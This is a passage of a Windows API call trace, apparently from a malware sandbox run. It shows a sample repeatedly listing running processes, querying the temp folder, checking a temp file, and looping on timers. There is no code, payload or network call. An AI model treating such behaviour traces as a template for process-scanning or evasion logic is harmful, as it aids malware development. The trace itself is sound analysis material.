th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0308.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0308.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0308.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0308.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0308.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0308.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0308.889] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0308.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0308.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0308.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0308.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0308.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0308.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0308.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0308.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0308.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0308.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0308.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0308.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0308.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0308.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0308.905] CloseHandle (hObject=0x294) returned 1 [0308.905] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.905] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.908] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.935] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.935] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.935] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.935] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0308.936] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0308.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0308.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0308.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0308.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0308.937] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0308.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.938] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0308.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0308.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0308.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0308.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0308.939] timeGetTime () returned 0x4d23b [0308.939] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.939] Sleep (dwMilliseconds=0xa) [0308.944] timeGetTime () returned 0x4d24b [0308.944] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.944] Sleep (dwMilliseconds=0xa) [0308.963] timeGetTime () returned 0x4d25a [0308.963] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.963] Sleep (dwMilliseconds=0xa) [0308.974] timeGetTime () returned 0x4d26a [0308.974] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.974] Sleep (dwMilliseconds=0xa) [0308.989] timeGetTime () returned 0x4d279 [0308.990] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0308.990] Sleep (dwMilliseconds=0xa) [0309.005] timeGetTime () returned 0x4d289 [0309.005] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.005] Sleep (dwMilliseconds=0xa) [0309.021] timeGetTime () returned 0x4d299 [0309.021] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.021] Sleep (dwMilliseconds=0xa) [0309.036] timeGetTime () returned 0x4d2a8 [0309.036] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.037] Sleep (dwMilliseconds=0xa) [0309.052] timeGetTime () returned 0x4d2b8 [0309.052] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.052] Sleep (dwMilliseconds=0xa) [0309.068] timeGetTime () returned 0x4d2c7 [0309.068] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.068] Sleep (dwMilliseconds=0xa) [0309.083] timeGetTime () returned 0x4d2d7 [0309.083] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.083] Sleep (dwMilliseconds=0xa) [0309.099] timeGetTime () returned 0x4d2e7 [0309.099] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0309.099] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0309.099] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0309.099] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0309.099] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0309.099] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.099] Sleep (dwMilliseconds=0xa) [0309.114] timeGetTime () returned 0x4d2f6 [0309.115] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.115] Sleep (dwMilliseconds=0xa) [0309.130] timeGetTime () returned 0x4d306 [0309.130] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.130] Sleep (dwMilliseconds=0xa) [0309.146] timeGetTime () returned 0x4d315 [0309.146] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.146] Sleep (dwMilliseconds=0xa) [0309.161] timeGetTime () returned 0x4d325 [0309.162] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.162] Sleep (dwMilliseconds=0xa) [0309.177] timeGetTime () returned 0x4d335 [0309.177] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.177] Sleep (dwMilliseconds=0xa) [0309.192] timeGetTime () returned 0x4d344 [0309.192] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.192] Sleep (dwMilliseconds=0xa) [0309.208] timeGetTime () returned 0x4d354 [0309.209] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.209] Sleep (dwMilliseconds=0xa) [0309.224] timeGetTime () returned 0x4d363 